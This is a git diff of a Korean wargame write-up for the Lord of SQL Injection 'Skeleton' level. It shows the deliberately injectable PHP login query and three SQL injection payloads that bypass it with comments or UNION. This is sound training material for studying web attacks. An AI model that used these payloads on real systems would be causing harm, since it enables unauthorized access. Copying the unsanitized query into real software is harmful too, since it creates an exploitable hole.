--- a/Wargame/Lord of SQL Injection/10. Skeleton.md
+++ b/Wargame/Lord of SQL Injection/10. Skeleton.md
@@ -5,22 +5,22 @@ MySQL 에서 주석 사용법을 아는가?
 ----
 ## 2. 코드
 ```php
-    <?php 
-      include "./config.php"; 
-      login_chk(); 
-      dbconnect(); 
-      
+    <?php
+      include "./config.php";
+      login_chk();
+      dbconnect();
+
       if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw]))
-        exit("No Hack ~_~"); 
-      
-      $query = "select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0"; 
-      echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
-      $result = @mysql_fetch_array(mysql_query($query)); 
-      
+        exit("No Hack ~_~");
+
+      $query = "select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0";
+      echo "<hr>query : <strong>{$query}</strong><hr><br>";
+      $result = @mysql_fetch_array(mysql_query($query));
+
       if($result['id'] == 'admin')
-        solve("skeleton"); 
-      
-      highlight_file(__FILE__); 
+        solve("skeleton");
+
+      highlight_file(__FILE__);
     ?>
 ```
 ----
@@ -62,9 +62,9 @@ id 가 첫번째 콜롬 이었고 'id'는 0과 같은 취급을 받았기 때문
 <del>물론 정확히는 모른다</del>
 
 + ?pw=' or id='admin'-- -
-+ ?pw=' or id='admin'# 
++ ?pw=' or id='admin'#
 + ?pw=' union select 'admin'-- -
 
 **Lastly, There can be many answers**
 
-**[Go to see other solutions](https://github.com/moreal/TIL/blob/master/Security/WarGame/WriteUp/los.eagle-jump.org/00.%20ReadMe.md)**
+**[Go to see other solutions](https://github.com/moreal/WriteUp/blob/master/Wargame/Lord%20of%20SQL%20Injection/00.%20ReadMe.m)**
